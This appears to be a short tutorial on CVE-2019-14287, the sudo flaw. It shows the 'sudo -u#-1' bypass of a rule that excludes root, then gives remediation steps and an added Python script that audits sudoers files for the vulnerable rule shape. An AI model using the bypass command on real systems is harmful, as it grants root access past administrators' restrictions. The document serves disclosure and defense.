CVE-2019-14287 - Linux sudo escalation of privileges
1. Create a user and make sure they're able to log in
Setup for logging in and executing tasks:
First you would have created a user:
useradd -m bob -G sudo -s /bin/bash
To be able to log in, you add to .profile (at the top)
Check who's in the sudo group with:
Edit the sudoers file
Because bob is a member of the sudo group, he can perform administrative tasks.
2. Partially restrict the user privilege specification
This doesn't help much because of the flaw.
myhost operators =(ALL,!root) !ALL
To check which user executes this:
sudo -u#-1 id -u
To execute a command as root:
su root leafpad
This cannot be executed because of that rule.
Or, with the user's password, it can be executed like this:
sudo -u#-1 leafpad
3. Remediation and Check Group Membership
You could add another line like this:
%sudo ALL=(ALL:!operator) !ALL
The result is that Bob cannot perform administrative tasks anymore.
But to avoid this strange setup altogether, you just need to make sure Bob doesn't have sudo rights.
Set default group for Bob
sudo usermod -a -G operator bob
gpasswd -d bob sudo
Result: Bob is no longer a member of sudo, cannot perform administrative tasks, and is just an operator.
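An added example (not part of the original post): a small Python check that scans sudoers text for the rule shape this flaw affects, a Runas user list that allows ALL while trying to exclude root, as in the (ALL,!root) line from section 2. The function names and the sample fragment are constructed for illustration; on a real system the text would come from /etc/sudoers and the files under /etc/sudoers.d.

```python
import re

RUNAS_SPEC = re.compile(r"\(([^)]*)\)")   # (users[:groups]) in a user specification
ROOT_EXCLUSIONS = {"!root", "!#0"}        # ways a rule tries to exclude root

def logical_lines(text):
    """Yield (first_line_no, rule) with backslash continuations joined, comments skipped."""
    buf, start = "", None
    for no, raw in enumerate(text.splitlines(), 1):
        if start is None:
            start = no
        if raw.rstrip().endswith("\\"):
            buf += raw.rstrip()[:-1] + " "
            continue
        line, buf = (buf + raw).strip(), ""
        first, start = start, None
        # '#' opens a comment unless it introduces a numeric uid such as #1000
        if line and not re.match(r"#(?!\d)", line):
            yield first, line

def audit_sudoers(text):
    """Return [(line_no, rule)] where the Runas users include ALL but exclude root."""
    findings = []
    for no, rule in logical_lines(text):
        for spec in RUNAS_SPEC.findall(rule):
            # Only the part before ':' is the Runas user list; the rest is groups.
            users = {re.sub(r"\s+", "", u) for u in spec.split(":", 1)[0].split(",")}
            if "ALL" in users and users & ROOT_EXCLUSIONS:
                findings.append((no, rule))
                break
    return findings

# Constructed sample; lines 2 and 6 are the two sudoers lines quoted on this page.
SAMPLE = """\
# constructed sudoers fragment
myhost operators =(ALL,!root) !ALL
alice ALL=(www-data) /usr/bin/systemctl restart nginx
carol ALL = (ALL, \\
      !#0) /usr/bin/vi
%sudo ALL=(ALL:!operator) !ALL
"""

if __name__ == "__main__":
    for no, rule in audit_sudoers(SAMPLE):
        print(f"line {no}: {rule}")
```

The %sudo line is not reported because its exclusion sits in the group part of the Runas spec, so root is not excluded from the user list in the first place. The match is a heuristic on parenthesised lists and does not expand Runas_Alias definitions.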
Hardened Execution - Least Privilege
As you can see, it's wiser not to give users sudo rights.
And this flaw is history once you update your Linux system.
Thank you for reading.